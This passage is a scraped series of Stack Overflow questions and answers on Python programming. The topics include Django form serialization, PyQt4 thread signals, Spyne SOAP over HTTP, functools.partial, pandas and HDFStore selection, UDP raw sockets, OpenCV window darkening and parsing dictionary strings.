clean_email(self): email = self.cleaned_data.get('email') email2 = self.cleaned_data.get('email2') if email != email2: raise forms.ValidationError("Emails must match") email_qs = User.objects.filter(email=email) if email_qs.exists(): raise forms.ValidationError("This email has already been registered") return email </code></pre>
0
2016-07-21T11:34:47Z
38,503,774
<p>As correctly pointed out by <a href="http://stackoverflow.com/questions/38503189/django-user-signup-registration-form-not-working/38503774#comment64405258_38503189">Nikhil</a>, you are trying to serialize a form instance. Instead, you should serialize the form data.</p> <p>From the <a href="https://docs.djangoproject.com/en/1.9/topics/forms/#field-data" rel="nofollow">Django Docs</a>:</p> <blockquote> <p>Whatever the data submitted with a form, once it has been successfully validated by calling is_valid() (and is_valid() has returned True), the validated form data will be in the form.cleaned_data dictionary.</p> </blockquote> <p>Also, <code>form.cleaned_data</code> will not be available if is_valid() does not return True. You can instead use <code>request.POST</code></p> <p>Instead of:</p> <pre><code> data = {'form': form, 'success': 'success'} else: data = {'form': form, 'error': 'error'} </code></pre> <p>You want to do:</p> <pre><code> data = {'form': form.cleaned_data, 'success': 'success'} else: data = {'form': request.POST, 'error': 'error'} </code></pre>
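The serialization failure can be reproduced without Django at all; the class below is a hypothetical stand-in for a form instance, not the real Django class:

```python
import json

class FakeForm:
    """Hypothetical stand-in for a Django form instance."""
    def __init__(self):
        self.cleaned_data = {'email': 'a@example.com'}

form = FakeForm()

# json.dumps cannot serialize an arbitrary object ...
try:
    json.dumps({'form': form})
    raised = False
except TypeError:
    raised = True

# ... but it can serialize the plain dict of field data.
payload = json.dumps({'form': form.cleaned_data, 'success': 'success'})
```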
1
2016-07-21T12:02:52Z
[ "jquery", "python", "django" ]
How to emit same signal for 2 classes from QThread
38,503,592
<p>I want to do this: there is a class called 'Main'. There is another class called 'aClass'. And there is a third class called 'Thread'; it is our thread class. 'Main' is our main class and we start our Thread class from the Main class. When our Thread class is started, it emits a signal from the run() function... The 'Main' and 'aClass' classes try to catch these signals. The 'Main' class is able to catch the signal which was emitted from the Thread class, but 'aClass' can't catch the same signal because I didn't start QThread from 'aClass'. I only defined it in 'aClass'.</p> <p>Here is the code:</p> <pre><code>#!/usr/bin/env python from PyQt4.QtGui import * from PyQt4.QtCore import * import sys class Main(QMainWindow): def __init__(self): QMainWindow.__init__(self) self.setWindowTitle("Test") self.aClass = aClass() self.thread = Thread() self.thread.printMessage.connect(self.write) self.initUI() def initUI(self): self.button = QPushButton("Start Process", self) self.button.clicked.connect(self.startProcess) def startProcess(self): self.thread.start() def terminateProcess(self): self.thread.terminate() def write(self): print "Main: hello world..." class aClass(object): def __init__(self): print "aClass: I have been started..." self.thread = Thread() self.thread.printMessage.connect(self.write) def write(self): print "aClass: hello world..." class Thread(QThread): printMessage = pyqtSignal() def __init__(self): QThread.__init__(self) print "Thread: I have been started..." def run(self): self.printMessage.emit() print "Thread: I emitted the message." if __name__ == "__main__": app = QApplication(sys.argv) root = Main() root.show() app.exec_() </code></pre> <p>The result: When the program starts, the output is:</p> <pre><code>aClass: I have been started... Thread: I have been started... Thread: I have been started... </code></pre> <p>When I click the 'Start Process' button, the output is:</p> <pre><code>Thread: I emitted the message. Main: hello world... 
</code></pre> <p>Total output:</p> <pre><code>aClass: I have been started... Thread: I have been started... Thread: I have been started... Thread: I emitted the message. Main: hello world... </code></pre> <p>The output that I want to get when I click 'Start Process':</p> <pre><code>Thread: I emitted the message. Main: hello world... aClass: hello world... </code></pre> <p>I want this result but I don't want to use self.thread.start() command from 'aClass' because I want to run Thread for only one time...</p>
0
2016-07-21T11:54:40Z
38,503,890
<p>What you are doing is creating a second <code>Thread</code> in the <code>aClass</code> object which is not the same <code>Thread</code> as in the <code>Main</code>. You need to connect the signal from the <code>self.thread</code> in <code>Main</code> to the slot <code>write</code> in your <code>self.aClass</code> object.</p> <p>You want to do this instead:</p> <pre><code>class Main(QMainWindow): def __init__(self): QMainWindow.__init__(self) self.setWindowTitle("Test") self.aClass = aClass() self.thread = Thread() self.thread.printMessage.connect(self.write) self.thread.printMessage.connect(self.aClass.write) ... class aClass(object): def __init__(self): print "aClass: I have been started..." #self.thread = Thread() #This makes a new Thread #self.thread.printMessage.connect(self.write) def write(self): print "aClass: hello world..." </code></pre>
0
2016-07-21T12:08:33Z
[ "python", "pyqt4", "qthread" ]
Send request on webservice from URL
38,503,703
<p>I have a SOAP web service written in Python with the Spyne module.</p> <p>This is it:</p> <pre><code>class Function(spyne.Service): __service_url_path__ = '/soap'; __in_protocol__ = Soap11(validator='lxml'); __out_protocol__ = Soap11(); @spyne.srpc(Unicode, _returns=Iterable(Unicode)) def Function(A): #some code if __name__ == '__main__': app.run(host = '127.0.0.1'); </code></pre> <p>And I need to send a request to that server from a URL. It should look like this: </p> <pre><code>IP:port/soap/function?A=1 </code></pre> <p>But when I try it, this appears:</p> <pre><code>You must issue a POST request with the Content-Type header properly set </code></pre> <p>But I don't know what that means. How should it be done properly? Can someone help with it?</p> <p>Should I just change that URL, or the server code too?</p> <p>Thank you very much</p>
0
2016-07-21T11:59:31Z
38,542,891
<p>So, now I have it.</p> <p><strong>This is the correct way:</strong></p> <pre><code>class Function(spyne.Service): __service_url_path__ = '/soap'; __in_protocol__ = HttpRpc(validator='soft'); #this is it __out_protocol__ = Soap11(); </code></pre> <p>Now, I can <strong>call the web service from a URL</strong> like this:</p> <pre><code>IP:port/soap/function?A=1 </code></pre> <p>So, this is it. I hope it will help someone someday :)</p>
0
2016-07-23T14:31:13Z
[ "python", "web-services", "post", "get", "spyne" ]
Parsing default arguments in python functions without executing the function
38,503,937
<p>I need to pass a function (without calling it) to another function, but I need to specify a different value for a default argument.</p> <p>For example:</p> <pre><code>def func_a(input, default_arg=True): pass def func_b(function): pass func_b(func_a(default_arg=False)) </code></pre> <p>This, however, <em>calls</em> <code>func_a()</code> and passes the result to <code>func_b()</code>.</p> <p>How do I set <code>default_arg=False</code> without executing <code>func_a</code>?</p>
1
2016-07-21T12:10:44Z
38,503,995
<p>Use a <a href="https://docs.python.org/3/library/functools.html#functools.partial" rel="nofollow"><code>functools.partial()</code> object</a>:</p> <pre><code>from functools import partial func_b(partial(func_a, default_arg=False)) </code></pre> <p>The <code>partial()</code> object is a callable too, when called it'll apply the arguments you gave it to the first argument.</p> <p>Demo:</p> <pre><code>&gt;&gt;&gt; from functools import partial &gt;&gt;&gt; def func_a(input, default_arg=True): ... print('func_a() called with {!r}, and default_arg={!r}'.format(input, default_arg)) ... &gt;&gt;&gt; def func_b(function): ... print('Calling the function') ... function('Foo bar') ... &gt;&gt;&gt; func_b(partial(func_a, default_arg=False)) Calling the function func_a() called with 'Foo bar', and default_arg=False </code></pre>
4
2016-07-21T12:13:41Z
[ "python", "function", "python-3.x", "default-arguments" ]
Parsing default arguments in python functions without executing the function
38,503,937
<p>I need to pass a function (without calling it) to another function, but I need to specify a different value for a default argument.</p> <p>For example:</p> <pre><code>def func_a(input, default_arg=True): pass def func_b(function): pass func_b(func_a(default_arg=False)) </code></pre> <p>This, however, <em>calls</em> <code>func_a()</code> and passes the result to <code>func_b()</code>.</p> <p>How do I set <code>default_arg=False</code> without executing <code>func_a</code>?</p>
1
2016-07-21T12:10:44Z
38,504,255
<p>Use a lambda function, like this:</p> <pre><code>func_b(lambda input: func_a(input, default_arg=False)) </code></pre> <p>In <code>func_b</code> you will have a callable <code>function</code> which accepts the argument <code>input</code> and executes <code>func_a</code> with the previously specified <code>default_arg</code> argument.</p> <p><strong>EDITED:</strong></p> <p>Thanks to <a href="https://stackoverflow.com/users/736308/cdarke">cdarke</a>, who points out that there is a more robust way to do this:</p> <pre><code>from functools import wraps def func_wrapper(f, **kwargs): @wraps(f) def wrapper(input): return f(input, **kwargs) return wrapper func_b(func_wrapper(func_a, default_arg=False)) </code></pre>
2
2016-07-21T12:25:50Z
[ "python", "function", "python-3.x", "default-arguments" ]
What does a comma mean in python?
38,503,941
<p>I stumbled upon this piece of code:</p> <pre><code>from gensim import corpora, models, similarities import numpy as np corpus = corpora.BleiCorpus('/home/edward/ap/ap.dat', '/home/edward/ap/vocab.txt') model = models.ldamodel.LdaModel(corpus, id2word = corpus.id2word, alpha=1) topics = [model[a] for a in corpus] dense = np.zeros((len(topics), 100), float) for ti, t in enumerate(topics): for tj, v in t: dense[ti,tj] = v </code></pre> <p>what does the comma in </p> <pre><code>dense[ti, tj] </code></pre> <p>mean? I don't think it's splitting the array and making tuples, because for that to happen, it needs to be like:</p> <pre><code>dense[:ti, tj] </code></pre> <p>right? the files declared in "Bleicorpus" are sample news texts from CNN. This was on a book called "Building Machine Learning Systems With Python".</p>
-8
2016-07-21T12:10:53Z
38,504,009
<p>In this case it creates the tuple <code>(ti, tj)</code> and passes it to <code>dense.__getitem__()</code>. As to what that accomplishes, you will need to see the documentation and/or source for <code>dense</code>'s type.</p>
0
2016-07-21T12:14:17Z
[ "python" ]
What does a comma mean in python?
38,503,941
<p>I stumbled upon this piece of code:</p> <pre><code>from gensim import corpora, models, similarities import numpy as np corpus = corpora.BleiCorpus('/home/edward/ap/ap.dat', '/home/edward/ap/vocab.txt') model = models.ldamodel.LdaModel(corpus, id2word = corpus.id2word, alpha=1) topics = [model[a] for a in corpus] dense = np.zeros((len(topics), 100), float) for ti, t in enumerate(topics): for tj, v in t: dense[ti,tj] = v </code></pre> <p>what does the comma in </p> <pre><code>dense[ti, tj] </code></pre> <p>mean? I don't think it's splitting the array and making tuples, because for that to happen, it needs to be like:</p> <pre><code>dense[:ti, tj] </code></pre> <p>right? the files declared in "Bleicorpus" are sample news texts from CNN. This was on a book called "Building Machine Learning Systems With Python".</p>
-8
2016-07-21T12:10:53Z
38,504,042
<p>The code <code>dense[ti, tj]</code> calls <code>dense.__getitem__((ti, tj))</code>. The comma in this case constructs a tuple. This doesn't work with lists, but it could work with a dictionary if the keys are tuples.</p> <pre><code>&gt;&gt;&gt; [1,2,3][1, 2] Traceback (most recent call last): File "&lt;stdin&gt;", line 1, in &lt;module&gt; TypeError: list indices must be integers, not tuple &gt;&gt;&gt; {(1, 2): 1}[1, 2] 1 </code></pre>
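With a NumPy array, as in the gensim snippet from the question, the tuple built by the comma performs a single 2-D lookup; a small sketch:

```python
import numpy as np

dense = np.zeros((3, 4))
ti, tj = 1, 2

# dense[ti, tj] is shorthand for dense[(ti, tj)]: NumPy receives the
# tuple and uses it to address row ti, column tj in one step.
dense[ti, tj] = 7.0

same_value = dense[(ti, tj)]   # identical lookup, tuple spelled out
chained = dense[ti][tj]        # two lookups: row first, then element
```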
0
2016-07-21T12:15:56Z
[ "python" ]
Python - socket.recvfrom() get entire IP/UDP packet?
38,503,982
<p>Is there a way to use <code>socket.recvfrom(buf)</code> to get all IP and UDP data? Specifically, I want to know the UDP header (source port, dest port, length, application data) as well as the IP specifics: what IP did it come from, what address was it sent to?</p> <p>Snippet:</p> <pre><code>addrinfo = socket.getaddrinfo(MULTICAST_ADDR, None)[0] sock = socket.socket(addrinfo[0], socket.SOCK_DGRAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.bind(('', DEST_PORT)) #Join Multicast grp. group = socket.inet_pton(addrinfo[0], addrinfo[4][0]) mreq = group + struct.pack('@I', 0) sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq) while True: udp_data,ip_sender = sock.recvfrom(4000) #Only returns udp data field and ip of sender </code></pre> <p>I'm on Windows, and using socket.SOCK_RAW hangs (?) Are there any work-arounds?</p>
0
2016-07-21T12:13:08Z
38,505,198
<p>Using</p> <pre><code>sock = socket.socket(socket.AF_INET6, socket.SOCK_RAW) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.bind(('', DEST_PORT)) sock.setsockopt(socket.IPPROTO_IPV6, socket.IP_HDRINCL, 1) </code></pre> <p>before joining multicast grp seems to work! </p>
0
2016-07-21T13:09:57Z
[ "python", "sockets", "udp", "ipv6" ]
Pandas/Python multiply columns by row
38,504,025
<p>Apologies if this is a simple question. </p> <p>I have two dataframes each with the same columns. I need to multiply each row in the second dataframe by the only row in the first. </p> <p>Eventually there will be more columns of different ages so I do not want to just multiply by a scalar. </p> <p>I have used df.multiply() and continue to get NaN for all values presumably because the two df are not matched in length. </p> <p>Is there a way to multiply each row in one dataframe by a singular row in another? </p> <pre><code>age 51200000.0 70000000.0 SFH 0 0.75 0.25 </code></pre> <p>.</p> <pre><code>age 51200000.0 70000000.0 Lambda 91.0 0.000000e+00 0.000000e+00 94.0 0.000000e+00 0.000000e+00 96.0 0.000000e+00 0.000000e+00 98.0 0.000000e+00 0.000000e+00 100.0 0.000000e+00 0.000000e+00 102.0 0.000000e+00 0.000000e+00 ... ... ... 1600000.0 1.127428e+22 8.677663e+21 </code></pre>
0
2016-07-21T12:15:09Z
38,504,133
<p>You can use <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.mul.html" rel="nofollow"><code>mul</code></a> by first row of <code>df1</code> selected by <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.iloc.html" rel="nofollow"><code>iloc</code></a>:</p> <pre><code>print (df2.mul(df1.iloc[0])) </code></pre> <p>Sample:</p> <pre><code>print (df1) 51200000.0 70000000.0 age 0 0.75 0.25 print (df2) 51200000.0 70000000.0 age 91.0 1.0 2.0 94.0 5.0 10.0 96.0 0.0 0.0 print (df2.mul(df1.iloc[0])) 51200000.0 70000000.0 age 91.0 0.75 0.5 94.0 3.75 2.5 96.0 0.00 0.0 </code></pre>
0
2016-07-21T12:20:41Z
[ "python", "pandas", "dataframe", "multiplication" ]
HDFStore: Select if column is in array
38,504,273
<p>I have a table with among others, the following columns:</p> <pre><code>&gt;&gt;&gt; hdf.select('foo').columns Out[22]: Index(['bar', 'units'], dtype='object') </code></pre> <p>Now I wanted to select those where <code>bar</code> has one of two values:</p> <pre><code>myBar = ['1500013010', '1500002071'] hdf.select('foo', 'bar in [{}]'.format(', '.join(myBar))) </code></pre> <p>But I got this Exception that I implied I couldn't use "bar" as a variable.</p> <blockquote> <p>all of the variable refrences must be a reference to an axis (e.g. 'index' or 'columns'), or a data_column The currently defined references are: index,columns</p> </blockquote> <p>But isn't it a column?</p> <pre><code>Traceback (most recent call last): File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/io/pytables.py", line 4593, in generate return Expr(where, queryables=q, encoding=self.table.encoding) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/computation/pytables.py", line 516, in __init__ self.terms = self.parse() File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/computation/expr.py", line 726, in parse return self._visitor.visit(self.expr) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/computation/expr.py", line 310, in visit return visitor(node, **kwargs) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/computation/expr.py", line 316, in visit_Module return self.visit(expr, **kwargs) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/computation/expr.py", line 310, in visit return visitor(node, **kwargs) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/computation/expr.py", line 319, in visit_Expr return self.visit(node.value, **kwargs) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/computation/expr.py", line 310, in visit return visitor(node, **kwargs) File 
"/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/computation/expr.py", line 627, in visit_Compare return self.visit(binop) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/computation/expr.py", line 310, in visit return visitor(node, **kwargs) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/computation/expr.py", line 400, in visit_BinOp op, op_class, left, right = self._possibly_transform_eq_ne(node) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/computation/expr.py", line 351, in _possibly_transform_eq_ne left = self.visit(node.left, side='left') File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/computation/expr.py", line 310, in visit return visitor(node, **kwargs) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/computation/expr.py", line 413, in visit_Name return self.term_type(node.id, self.env, **kwargs) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/computation/pytables.py", line 38, in __init__ super(Term, self).__init__(name, env, side=side, encoding=encoding) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/computation/ops.py", line 57, in __init__ self._value = self._resolve_name() File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/computation/pytables.py", line 44, in _resolve_name raise NameError('name {0!r} is not defined'.format(self.name)) NameError: name 'bar' is not defined During handling of the above exception, another exception occurred: Traceback (most recent call last): File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/IPython/core/interactiveshell.py", line 2885, in run_code exec(code_obj, self.user_global_ns, self.user_ns) File "&lt;ipython-input-21-75c9827e34f0&gt;", line 1, in &lt;module&gt; hdf.select('foo', 'bar in [{}]'.format(', '.join(bar))) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/io/pytables.py", line 680, in select return 
it.get_result() File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/io/pytables.py", line 1364, in get_result results = self.func(self.start, self.stop, where) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/io/pytables.py", line 673, in func columns=columns, **kwargs) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/io/pytables.py", line 4021, in read if not self.read_axes(where=where, **kwargs): File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/io/pytables.py", line 3222, in read_axes self.selection = Selection(self, where=where, **kwargs) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/io/pytables.py", line 4580, in __init__ self.terms = self.generate(where) File "/asdf/anaconda/envs/myenv3/lib/python3.5/site-packages/pandas/io/pytables.py", line 4605, in generate .format(where, ','.join(q.keys())) ValueError: The passed where expression: bar in [1500013010, 1500002071] contains an invalid variable reference all of the variable refrences must be a reference to an axis (e.g. 'index' or 'columns'), or a data_column The currently defined references are: index,columns </code></pre>
0
2016-07-21T12:26:39Z
38,504,517
<p>your column(s) are not indexed, hence not searchable, so you can't use them in the <code>where</code> parameter.</p> <p>Demo:</p> <pre><code>In [131]: df = pd.DataFrame(np.random.randint(0,20,size=(5, 3)), columns=list('ABC')) In [132]: df Out[132]: A B C 0 19 4 18 1 4 14 16 2 17 13 9 3 19 9 13 4 16 8 10 In [133]: fn = 'C:/temp/test.h5' In [134]: store = pd.HDFStore(fn) In [135]: store.append('df', df) In [136]: store.select('df', 'B &gt; 10') --------------------------------------------------------------------------- ... NameError: name 'B' is not defined During handling of the above exception, another exception occurred: ... ValueError: The passed where expression: B &gt; 10 contains an invalid variable reference all of the variable refrences must be a reference to an axis (e.g. 'index' or 'columns'), or a data_column The currently defined references are: index,columns </code></pre> <p>now let's try it with an indexed columns:</p> <pre><code>In [137]: store.append('df_indexed', df, data_columns=True) In [139]: store.select('df_indexed', 'B &gt; 10') Out[139]: A B C 1 4 14 16 2 17 13 9 </code></pre> <p>How to check whether columns are indexed or not:</p> <pre><code>In [154]: store.get_storer('df_indexed').table.colindexes Out[154]: { "C": Index(6, medium, shuffle, zlib(1)).is_csi=False, "index": Index(6, medium, shuffle, zlib(1)).is_csi=False, "B": Index(6, medium, shuffle, zlib(1)).is_csi=False, "A": Index(6, medium, shuffle, zlib(1)).is_csi=False} In [155]: store.get_storer('df').table.colindexes Out[155]: { "index": Index(6, medium, shuffle, zlib(1)).is_csi=False} </code></pre>
2
2016-07-21T12:38:30Z
[ "python", "pandas", "dataframe", "hdf", "hdf5storage" ]
Python + OpenCV, change brightness/darkness outside a sliding window?
38,504,350
<p>I'm working with Python and OpenCV and I'm a newbie in both. For my project, I need to move a sliding window over a picture; for each position of the window the area outside the window must be shown darker than the area inside the window.</p> <p>This is the part of my code that takes care of the picture and window visualization (the valid positions for the sliding window are calculated somewhere else)</p> <pre><code>for (x, y, window) in valid_positions: if window.shape[0] != winH or window.shape[1] != winW: continue # Put here stuff to process the window content # i.e apply a classifier clone = image.copy() cv2.rectangle(clone, (x, y), (x + winW, y + winH), (0, 255, 0), 2) cv2.imshow("Window", clone) cv2.waitKey(1) time.sleep(0.025) </code></pre> <p>The window is created and it slides on the valid positions, so that part works well. But I have absolutely no idea on how to make the picture outside the window appear darker.</p> <p>Any suggestions? Thanks in advance.</p> <p>EDIT: i forgot to add an important detail: my input images are always in black and white (not even greyscale, just black and white pixels). Maybe this makes it easier to alter the brightness/darkness?</p>
1
2016-07-21T12:29:34Z
38,507,263
<p>In general, you can preserve the content inside the window and lower the intensity of the entire image, then replace the area inside the window with the original content. That trick should work. This part of the code may look like:</p> <pre><code>clone = image.copy() windowArea = clone[y:y + winH, x:x + winW].copy() clone = np.floor(clone * 0.5).astype('uint8') # 0.5 can be adjusted clone[y:y + winH, x:x + winW] = windowArea cv2.rectangle(clone, (x, y), (x + winW, y + winH), (0, 255, 0), 2) </code></pre> <p>Note that this snippet assumes <code>import numpy as np</code> earlier in the file.</p>
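As a self-contained illustration of the idea in this answer — darken everything, then paste the untouched window back — here is a NumPy-only sketch on a tiny synthetic black-and-white image (the image and window sizes are made up for the demo; the function name is my own):

```python
import numpy as np

def darken_outside_window(image, x, y, win_w, win_h, factor=0.5):
    """Return a copy of `image` darkened everywhere except the
    (x, y, win_w, win_h) window, whose content is preserved."""
    clone = image.copy()
    # Save the window content before darkening the whole image
    window_area = clone[y:y + win_h, x:x + win_w].copy()
    clone = np.floor(clone * factor).astype('uint8')
    # Restore the original (bright) window content
    clone[y:y + win_h, x:x + win_w] = window_area
    return clone

# Tiny demo: an all-white 6x8 image with a 3x2 window at (2, 1)
img = np.full((6, 8), 255, dtype=np.uint8)
out = darken_outside_window(img, x=2, y=1, win_w=3, win_h=2)
print(out[1, 2], out[0, 0])  # inside stays 255, outside drops to 127
```

Because the question's images are pure black and white, the outside pixels simply go from 255 to 127 (and black stays black), which gives the dimmed-surroundings effect.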
0
2016-07-21T14:40:09Z
[ "python", "opencv", "brightness" ]
How to read a dictionary in a different manner?
38,504,377
<p>I have a dictionary whose keys are numbers and whose values are strings containing one or more lists. I want to read this dictionary so that I can separate the keys and values.</p> <p><strong>Dictionary-</strong> </p> <pre><code>{ 1468332424064000: '[80000,2]', 1468332423282000: '[30000,6]', 1468332421081000: '[40000,2]', 1468332424121000: '[30000,2][40000,2]', 1468332424014000: '[60000,2]', 1468332421131000: '[40000,2][30000,6]', 1468332422921000: '[60000,2]', 1468332421046000: '[40000,2]', 1468332422217000: '[40000,2]', 1468332424921000: '[40000,2]', 1468332421459000: '[30000,6]', 1468332422579000: '[60000,2][30000,6]', 1468332422779000: '[30000,2]', 1468332424161000: '[70000,6]' } </code></pre> <p><strong>Program-Code-</strong></p> <pre><code>for k,v in latency_obj.d.iteritems(): li = v.split() for l in li: print l </code></pre> <p><strong>Output-</strong></p> <pre><code>[80000,2] [30000,6] [40000,2] [30000,2][40000,2] [60000,2] [40000,2][30000,6] [60000,2] [40000,2] [40000,2] [40000,2] [30000,6] [60000,2][30000,6] [30000,2] [70000,6] </code></pre> <p>But I want these two lists as separate lists so that I can retrieve their values. Any idea what I'm missing?</p>
0
2016-07-21T12:30:34Z
38,504,637
<p>Assuming that you expect your result to look like</p> <pre><code>[80000,2] [30000,2] [40000,2] [60000,2] [30000,6] [40000,2] [30000,6] [30000,2] [40000,2] [40000,2] [70000,6] [60000,2] [30000,6] [60000,2] [40000,2] [40000,2] [30000,6] </code></pre> <p>I suggest splitting each value on <code>[</code>, like so:</p> <pre><code>for k, v in d.iteritems(): li = v.split('[') for l in li: if l: print '[' + l </code></pre>
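An alternative sketch (my own, not part of the answer above): since each value is a string of <code>[number,number]</code> pairs, a regular expression can pull every pair out as integers directly, with no empty-string bookkeeping from <code>split</code>. The sample dictionary below is a subset of the question's data:

```python
import re

d = {
    1468332424064000: '[80000,2]',
    1468332424121000: '[30000,2][40000,2]',
    1468332421131000: '[40000,2][30000,6]',
}

parsed = {}
for k, v in d.items():  # use d.iteritems() on Python 2, as in the question
    # Each match is a ('30000', '2')-style tuple of digit strings
    parsed[k] = [(int(a), int(b)) for a, b in re.findall(r'\[(\d+),(\d+)\]', v)]

print(parsed[1468332424121000])  # [(30000, 2), (40000, 2)]
```

This gives real Python tuples per list, so the individual values are immediately usable (e.g. for summing or indexing) instead of being substrings that still need parsing.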
0
2016-07-21T12:44:59Z
[ "python", "list", "dictionary" ]